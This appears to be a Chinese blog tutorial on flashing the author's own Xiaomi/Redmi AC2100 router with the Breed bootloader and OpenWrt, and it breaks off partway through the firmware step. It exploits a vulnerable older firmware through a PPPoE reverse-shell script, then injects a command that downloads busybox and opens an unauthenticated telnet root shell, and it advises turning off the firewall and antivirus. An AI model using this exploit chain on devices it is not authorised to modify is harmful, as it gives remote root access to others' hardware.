小米和红米AC2100使用Breed刷Openwrt

发表于 2020-10-19 更新于 2021-04-25 分类于 Openwrt 阅读次数： Waline：本文字数： 1.7k 阅读时长 ≈ 2 分钟

手里的小米AC2100路由器入手已经快一年了，之前一直是作为软路由下的二级路由使用，原来的软路由是旧台式主机做的，声音一直很大，功率也不低，于是考虑把小米路由器刷成软路由。中间也是百般出错，花费了大半天时间，终于完成，目前稳定性还没有测试，记录一下安装过程。

第一步

首先是把小米路由器恢复出厂设置，并把路由器版本恢复到有漏洞的版本，我这里恢复的是2.03版本，版本链接会在文章末尾贴出来，用2.7版本的话到反弹shell那个地方会出现，脚本错误，结尾是NoneType has no len（）。我就是被这个坑了大半天时间。恢复步骤看下面图片：

至此版本恢复完成。

第二步

1.用一键telnet脚本，开启小米路由器telnet功能，我电脑本身开着telnet所以不用再开启了，如果电脑没有开启telnet功能的，需要开启，至于开启方法百度搜索吧。

2.按照脚本要求需要把电脑的除了连路由器的网卡，其余的全部禁用，并把网卡地址改为192.168.31.177，网关改为192.168.31.1，关掉电脑防火墙，及杀毒软件。

3.接下来就是路由器侧，需要把wan口连接跟wan口紧挨着的lan口，然后再把从上面向下数第二个网口连接电脑网口。

4.登录路由器后台，设置上网方式位PPOE，设置用户名123，密码123，点击拨号，然后打开一键telnet脚本，回车会看到PPOE服务的包，再返回到一键telnet脚本输入y，会出现反弹的shell，复制开启telnet命令，粘贴进去并回车，开启telnet命令如下：

1	cd /tmp&&wget http://192.168.31.177:8081/busybox&&chmod a+x ./busybox&&./busybox telnetd -l /bin/sh

接下来，打开一个cmd窗口，输入命令telnet 192.168.31.1，前面都没问题的话，会成功连接路由器，接下来开始刷breed后台。命令如下：

1
2
3

wget http://192.168.31.177:8081/breed-mt7621-xiaomi-r3g.bin&&nvram set uart_en=1&&nvram set bootdelay=5&&nvram set flag_try_sys1_failed=1&&nvram commit
mtd -r write breed-mt7621-xiaomi-r3g.bin Bootloader

然后就是等待路由器重启。重启完成之后把电脑网卡设置为自动获取。接下来就可以登录到breed后台了。

下面是其中几张截图：

第三步

重点来了，接下来就是刷入固件，这里用的是恩山大佬提供的【1009多功能版OpenWrt】。
首先需要在breed后台，选择环境变量编辑，输入字段xiaomi.r3g.bootfw，值为2，并保存，再选择固件更新上传固件文件，大佬说的是用breed刷openwrt的话需要先安装过渡文件再在安装之后的后台上传需要的版本升级，一下几张图提供参考：